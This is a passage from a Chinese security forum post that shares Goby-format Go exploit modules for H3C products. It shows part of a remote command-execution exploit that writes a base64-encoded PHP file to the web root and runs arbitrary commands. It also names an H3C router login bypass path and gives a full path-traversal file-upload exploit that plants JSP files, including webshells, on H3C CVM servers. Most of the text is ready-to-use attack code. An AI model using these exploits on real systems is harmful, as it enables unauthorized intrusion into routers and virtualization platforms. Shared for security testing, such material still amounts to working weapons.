  26.   checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
  27.     // 攻击 URL
  28.     requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php")
  29.     requestConfig.VerifyTls = false
  30.     requestConfig.FollowRedirect = false
  31.     requestConfig.Timeout = 15

  32.     // 发送攻击请求
  33.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
  34.       if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) {
  35.         return true
  36.       }
  37.     }
  38.     return false
  39.   }

  40.   ExpManager.AddExploit(NewExploit(
  41.     goutils.GetFileName(),
  42.     expJson,
  43.     func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {

  44.       // 生成随机文件名
  45.       randomFileName := goutils.RandomHexString(6)

  46.       // 漏洞攻击包,POC 使用自删除的文件
  47.       // <?php echo md5(233);unlink(__FILE__);
  48.       if exploitTopACM092348783482("echo PD9waHAgZWNobyBtZDUoMjMzKTt1bmxpbmsoX19GSUxFX18pOw== |base64 -d >/var/www/html/"+randomFileName+".php", u) {
  49.         return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u)
  50.       }

  51.       return false
  52.     },
  53.     func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {

  54.       cmd := ss.Params["cmd"].(string)

  55.       if exploitTopACM092348783482(cmd, expResult.HostInfo) {
  56.         expResult.Success = true
  57.         expResult.Output = "命令执行成功"
  58.       }

  59.       return expResult
  60.     },
  61.   ))
  62. }

  63. // https://heiwado.cn:8443/
复制代码

10、H3C 企业路由器 (ER、ERG2、GR 系列) 任意用户登录/命令执行


/userLogin.asp/actionpolicy_status/

11、H3C CVM 前台任意文件上传漏洞


  1. package exploits

  2. import (
  3.   "git.gobies.org/goby/goscanner/goutils"
  4.   "git.gobies.org/goby/goscanner/jsonvul"
  5.   "git.gobies.org/goby/goscanner/scanconfig"
  6.   "git.gobies.org/goby/httpclient"
  7.   "strings"
  8. )

  9. func init() {
  10.   expJson := `{
  11.       "Name": "H3C CVM Arbitrary File Upload Vulnerability",
  12.       "Description": "<p><span style="color: var(--primaryFont-color);">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style="color: var(--primaryFont-color);">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
  13.       "Product": "H3C-CVM",
  14.   "Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/",
  15.   "DisclosureDate": "2022-05-25",
  16.   "Author": "su18@javaweb.org",
  17.   "FofaQuery": " server="H3C-CVM" || (banner="H3C-CVM" && banner="Server: ")",
  18.   "GobyQuery": " server="H3C-CVM" || (banner="H3C-CVM" && banner="Server: ")",
  19.   "Level": "3",
  20.       "Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
  21.       "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
  22.   "References": [
  23.     "https://fofa.so/"
  24.   ],
  25.   "Is0day": false,
  26.   "HasExp": true,
  27.   "ExpParams": [
  28.     {
  29.       "name": "fileName",
  30.       "type": "input",
  31.       "value": "evil",
  32.       "show": ""
  33.     },
  34.     {
  35.       "name": "fileContent",
  36.       "type": "input",
  37.       "value": "<%out.println("123");%>",
  38.       "show": ""
  39.     }
  40.   ],
  41.   "ExpTips": {
  42.     "Type": "",
  43.     "Content": ""
  44.   },
  45.   "ScanSteps": [
  46.     "AND",
  47.     {
  48.       "Request": {
  49.         "method": "GET",
  50.         "uri": "/test.php",
  51.         "follow_redirect": true,
  52.         "header": {},
  53.         "data_type": "text",
  54.         "data": ""
  55.       },
  56.       "ResponseTest": {
  57.         "type": "group",
  58.         "operation": "AND",
  59.         "checks": [
  60.           {
  61.             "type": "item",
  62.             "variable": "$code",
  63.             "operation": "==",
  64.             "value": "200",
  65.             "bz": ""
  66.           },
  67.           {
  68.             "type": "item",
  69.             "variable": "$body",
  70.             "operation": "contains",
  71.             "value": "test",
  72.             "bz": ""
  73.           }
  74.         ]
  75.       },
  76.       "SetVariable": []
  77.     }
  78.   ],
  79.   "ExploitSteps": [
  80.     "AND",
  81.     {
  82.       "Request": {
  83.         "method": "GET",
  84.         "uri": "/test.php",
  85.         "follow_redirect": true,
  86.         "header": {},
  87.         "data_type": "text",
  88.         "data": ""
  89.       },
  90.       "ResponseTest": {
  91.         "type": "group",
  92.         "operation": "AND",
  93.         "checks": [
  94.           {
  95.             "type": "item",
  96.             "variable": "$code",
  97.             "operation": "==",
  98.             "value": "200",
  99.             "bz": ""
  100.           },
  101.           {
  102.             "type": "item",
  103.             "variable": "$body",
  104.             "operation": "contains",
  105.             "value": "test",
  106.             "bz": ""
  107.           }
  108.         ]
  109.       },
  110.       "SetVariable": []
  111.     }
  112.   ],
  113.   "Tags": [
  114.     "Arbitrary File Creation"
  115.   ],
  116.   "VulType": [
  117.     "Arbitrary File Creation"
  118.   ],
  119.   "CVEIDs": [
  120.     ""
  121.   ],
  122.   "CNNVD": [
  123.     ""
  124.   ],
  125.   "CNVD": [
  126.     ""
  127.   ],
  128.   "CVSSScore": "8.0",
  129.   "Translation": {
  130.     "CN": {
  131.       "Name": "H3C CVM 前台任意文件上传漏洞",
  132.       "Product": "H3C-CVM",
  133.       "Description": "<p>H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。 通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。<br></p><p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
  134.       "Recommendation": "<p>目前官方尚未发布安全补丁,请关注厂商更新。<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
  135.       "Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;"><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C CVM</span><span style="color: rgb(22, 28, 37); font-size: 16px;"> </span>存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
  136.       "VulType": [
  137.         "⽂件上传"
  138.       ],
  139.       "Tags": [
  140.         "⽂件上传"
  141.       ]
  142.     },
  143.     "EN": {
  144.       "Name": "H3C CVM Arbitrary File Upload Vulnerability",
  145.       "Product": "H3C-CVM",
  146.       "Description": "<p><span style="color: var(--primaryFont-color);">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style="color: var(--primaryFont-color);">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
  147.       "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
  148.       "Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
  149.       "VulType": [
  150.         "Arbitrary File Creation"
  151.       ],
  152.       "Tags": [
  153.         "Arbitrary File Creation"
  154.       ]
  155.     }
  156.   },
  157.   "AttackSurfaces": {
  158.     "Application": null,
  159.     "Support": null,
  160.     "Service": null,
  161.     "System": null,
  162.     "Hardware": null
  163.   }
  164. }`

  165.   exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {

  166.     // 上传文件
  167.     requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222")
  168.     requestConfig.VerifyTls = false
  169.     requestConfig.FollowRedirect = false
  170.     requestConfig.Header.Store("Content-range", "bytes 0-10/20")
  171.     requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login")
  172.     requestConfig.Data = fileContent

  173.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
  174.       if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, ""success\\":true") {
  175.         return true
  176.       }
  177.     }

  178.     return false
  179.   }

  180.   checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {

  181.     requestConfig := httpclient.NewGetRequestConfig("/" + fileName)
  182.     requestConfig.VerifyTls = false
  183.     requestConfig.FollowRedirect = false

  184.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
  185.       return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent)
  186.     }

  187.     return false
  188.   }

  189.   ExpManager.AddExploit(NewExploit(
  190.     goutils.GetFileName(),
  191.     expJson,
  192.     func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {

  193.       rand := goutils.RandomHexString(6)
  194.       rand2 := goutils.RandomHexString(6)

  195.       if exploitUploadFile2398429842(rand2, "<%out.print(""+rand+"");%>", u) {
  196.         return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u)
  197.       }

  198.       return false
  199.     },
  200.     func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {

  201.       fileContent := ss.Params["fileContent"].(string)
  202.       fileName := ss.Params["fileName"].(string)

  203.       if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) {

  204.         expResult.Success = true
  205.         expResult.Output = "文件上传已成功,请检查路径:/cas/js/lib/buttons/" + fileName + ".jsp"
  206.       }

  207.       return expResult
  208.     },
  209.   ))
  210. }
复制代码
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 (吉沃科技) ( 京ICP备2021005070号 )

GMT+8, 2024-12-22 22:44 , Processed in 0.063069 second(s), 22 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表